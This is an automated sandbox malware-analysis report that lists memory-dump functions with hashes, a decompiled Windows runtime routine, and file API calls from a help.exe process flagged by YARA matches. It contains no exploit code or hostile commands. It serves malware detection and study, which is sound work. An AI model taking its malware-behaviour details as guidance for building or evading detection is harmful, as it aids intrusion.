                                                                                                            Function 00AF3A1C, Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction ID: 84027b339a1c9fa3c8714fd10cdbc50cddf42fbce164f49dd980238e259de827
                                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction Fuzzy Hash: 34C04C32180648BBCB126E85DD01F16BB69E795B60F154021B7044A5618576ED61D598
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AF7D50, Relevance: .0, Instructions: 7COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction ID: 93851d1ead0c6e1e0e7f52208d0d1b4f093f8eb81a3843c4a591948943e3f2f8
                                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction Fuzzy Hash: 4EB092343019408FCE16DF18C180B2933E4BB44B40B8400D0E400CBA20D229E8008900
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B02ACB, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction ID: 223e44ea3a4a03c2a87b3417fcc613519e7a2449299f7c3ac1a19b95dfd3a034
                                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction Fuzzy Hash: F1B01232D10480CFCF02EF40C710B197331FB00750F058490A00127931C228AC01CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B198A0, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                                                                            • Instruction ID: d1f61a1f0826c297f3b4f88d779ae460630c90a6185e913c340da72a4c58cd02
                                                                                                            • Opcode Fuzzy Hash: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                                                                            • Instruction Fuzzy Hash: 2F90026230101402D202615954146060049D7D1395FA1C066E5454555D86658963F172
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19820, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                                                                            • Instruction ID: 569db728960dd894bb1af00b8df073242ffe7d4b5584b0f96bba3f736c7f5593
                                                                                                            • Opcode Fuzzy Hash: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                                                                            • Instruction Fuzzy Hash: 8A90027224101402D241715954046060049E7D0391FA1C066A4454554E86958A67FAA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1B040, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                                                                            • Instruction ID: 50a48cfe13d2cb22d8fd6f2c83fb7cfeed406dd0dfd33745ed1f265d3afdd162
                                                                                                            • Opcode Fuzzy Hash: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                                                                            • Instruction Fuzzy Hash: 919002A2601150434640B15958044065055E7E13513A1C175A4484560C86A88866E2A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B195F0, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                                                                            • Instruction ID: 9fc2b72a0185a3b1edb09e80552e4ee6127d0e51746bc2a056ed56ae3ee4fb0a
                                                                                                            • Opcode Fuzzy Hash: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                                                                            • Instruction Fuzzy Hash: 1D90027220101802D204615958046860045D7D0351F61C065AA054655E96A588A2B171
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B199D0, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                                                                            • Instruction ID: 6f13fbd29106bb8a34cbf4c991ed938039b17694a49eb4eb3dce3f004d45b424
                                                                                                            • Opcode Fuzzy Hash: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                                                                            • Instruction Fuzzy Hash: 4E9002A221101042D204615954047060085D7E1351F61C066A6184554CC5698C72A165
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1AD30, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                                                                            • Instruction ID: 701a25843c05156c8105ba61d43a1cc2539607e5f94de8a632a73d45cda9ae55
                                                                                                            • Opcode Fuzzy Hash: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                                                                            • Instruction Fuzzy Hash: CB900272A05010129240715958146464046E7E0791B65C065A4544554C89948A66A3E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19520, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                                                                            • Instruction ID: 8fac76a22ee0d0f2a624051eccd7de92a558d63bc5beff0480abd391dd690fd5
                                                                                                            • Opcode Fuzzy Hash: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                                                                            • Instruction Fuzzy Hash: 7A9002E2201150924600A2599404B0A4545D7E0351B61C06AE5084560CC5658862E175
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19560, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                                                                            • Instruction ID: b4df95846cebfd9ed82958b3dfb4a29e0193128da393a07eb2c58bdfb5ff7d91
                                                                                                            • Opcode Fuzzy Hash: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                                                                            • Instruction Fuzzy Hash: D8900266221010020245A559160450B0485E7D63A13A1C069F5446590CC6618876A361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19950, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                                                                            • Instruction ID: d5dac0d0de899ae0a054fa6d593e412f8733831f7c3ba8f99474e8cd4b54b794
                                                                                                            • Opcode Fuzzy Hash: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                                                                            • Instruction Fuzzy Hash: 159002A220141403D240655958046070045D7D0352F61C065A6094555E8A698C62B175
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19A80, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                                                                            • Instruction ID: 9c69a78628ff746e3d1181540bde0232b93256f3c937681fd77c034d2c141bb7
                                                                                                            • Opcode Fuzzy Hash: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                                                                            • Instruction Fuzzy Hash: FE90026220145442D24062595804B0F4145D7E1352FA1C06DA8186554CC9558866A761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B196D0, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                                                                            • Instruction ID: bd95271ba52b0727cf5103fb14e4b63ba556527c545f9121800c4812b2e497f4
                                                                                                            • Opcode Fuzzy Hash: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                                                                            • Instruction Fuzzy Hash: 8C90027220101842D20061595404B460045D7E0351F61C06AA4154654D8655C862B561
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19A10, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                                                                            • Instruction ID: 3d53ca2832130d757d3dd00e71f070f84a7731d9ae576a53f2e8334758dbac97
                                                                                                            • Opcode Fuzzy Hash: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                                                                            • Instruction Fuzzy Hash: 6590027220141402D200615958087470045D7D0352F61C065A9194555E86A5C8A2B571
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19610, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
                                                                                                            • Instruction ID: 8f7cf461df369404c90b61c88c1a225f3b6968fbcc00fe9aaeda96761e0c895f
                                                                                                            • Opcode Fuzzy Hash: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
                                                                                                            • Instruction Fuzzy Hash: BA90027260501802D250715954147460045D7D0351F61C065A4054654D87958A66B6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19650, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                                                                            • Instruction ID: bcfa2d3c86f402522076c547ff815ffd85be4ae883e8234d4cb7521bc2a0223c
                                                                                                            • Opcode Fuzzy Hash: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                                                                            • Instruction Fuzzy Hash: CD90027220505842D24071595404A460055D7D0355F61C065A4094694D96658D66F6A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                                                                            • Instruction ID: f889f709246e2cdc42d769639b9ef382f05904cf78736c5a95b27794db9a8ebb
                                                                                                            • Opcode Fuzzy Hash: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                                                                            • Instruction Fuzzy Hash: 1290027220145002D2407159944460B5045E7E0351F61C465E4455554C86558867E261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19730, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                                                                            • Instruction ID: 1bca6a9010ad2ae18c616617553fb475fd7c17fb9c47485b9dc961269aad979b
                                                                                                            • Opcode Fuzzy Hash: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                                                                            • Instruction Fuzzy Hash: A990026260501402D240715964187060055D7D0351F61D065A4054554DC6998A66B6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1A710, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                                                                            • Instruction ID: ed337d47fb915a4a2ff6a909b41e3e5108f3a55049479b067d50d5e7ea009236
                                                                                                            • Opcode Fuzzy Hash: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                                                                            • Instruction Fuzzy Hash: 5C900272301010529600A6996804A4A4145D7F0351B61D069A8044554C85948872A161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19B00, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                                                                            • Instruction ID: 71b4002038eab0014da4f1c6dd726621ddb8b20eedc6d004ecc4c70cfb15982c
                                                                                                            • Opcode Fuzzy Hash: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                                                                            • Instruction Fuzzy Hash: 9A90026224101802D240715994147070046D7D0751F61C065A4054554D86568976B6F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19770, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                                                                            • Instruction ID: f3526e81a82497404a6cb9d2483da17108898e73a6fbafdd1628a663a87e54bc
                                                                                                            • Opcode Fuzzy Hash: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                                                                            • Instruction Fuzzy Hash: CD90026220505442D20065596408A060045D7D0355F61D065A5094595DC6758862F171
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B1A770, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                                                                            • Instruction ID: 467f360ce14fd5b74dae489610c6b39c32bb70f8ad835b7c7fd40a5fb28c685c
                                                                                                            • Opcode Fuzzy Hash: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                                                                            • Instruction Fuzzy Hash: 0A90027620505442D60065596804A870045D7D0355F61D465A445459CD86948872F161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19760, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                                                                            • Instruction ID: 7f462de4ae49f3f5178ce0e7846c0b46e699a8a4746bd24e912bf46adc43583d
                                                                                                            • Opcode Fuzzy Hash: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                                                                            • Instruction Fuzzy Hash: FE90027220101403D200615965087070045D7D0351F61D465A4454558DD6968862B161
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B19670, Relevance: .0, Instructions: 2COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction ID: 6543777ceaf0fd68972e27952e81246fdb243592efeac8130102c3b41dfda658
                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                            0x00b6fdda
                                                                                                            0x00b6fde2
                                                                                                            0x00b6fde5
                                                                                                            0x00b6fdec
                                                                                                            0x00b6fdfa
                                                                                                            0x00b6fdff
                                                                                                            0x00b6fe0a
                                                                                                            0x00b6fe0f
                                                                                                            0x00b6fe17
                                                                                                            0x00b6fe1e
                                                                                                            0x00b6fe19
                                                                                                            0x00b6fe19
                                                                                                            0x00b6fe19
                                                                                                            0x00b6fe20
                                                                                                            0x00b6fe21
                                                                                                            0x00b6fe22
                                                                                                            0x00b6fe25
                                                                                                            0x00b6fe40

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B6FDFA
                                                                                                            Strings
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B6FE2B
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B6FE01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                                                                            • Instruction ID: 052a8b7edf803f6685686d94243027dd691b749f5d39ba244ab746988c770325
                                                                                                            • Opcode Fuzzy Hash: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                                                                            • Instruction Fuzzy Hash: E4F0C232240601BBD6201A45DC02F73BF9AEB44730F250254F628565E1DA62BC7097A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: help.exe PID: 7136 Parent PID: 6432 help.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 004181D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00413BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0041821D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID: .z`
                                                                                                            • API String ID: 823142352-1441809116
                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                            • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                            • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004181CE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00413BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0041821D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID: .z`
                                                                                                            • API String ID: 823142352-1441809116
                                                                                                            • Opcode ID: 51061a58dcd882da688b26defca0ab32f93f88b08796704616724eea9622ddd5
                                                                                                            • Instruction ID: fd5f7433f2a34c93221db380210f24dbc3382fffcce8468c86bd18cbacf7aea4
                                                                                                            • Opcode Fuzzy Hash: 51061a58dcd882da688b26defca0ab32f93f88b08796704616724eea9622ddd5
                                                                                                            • Instruction Fuzzy Hash: 9AF0C4B2200108AFCB08CF88DD84EEB37A9AF8C354F15824CFA0D97240D630E851CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041827A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:A,FFFFFFFF,?,b=A,?,00000000), ref: 004182C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: !:A
                                                                                                            • API String ID: 2738559852-3803994810
                                                                                                            • Opcode ID: 4f06464f171db7dfd99c1a611f433d184ec53262f360102c0d624b4100b6e755
                                                                                                            • Instruction ID: 0e954488afad77a3cd6483d6c9f2cc5304775cc5763836557ad725b5a7750ece
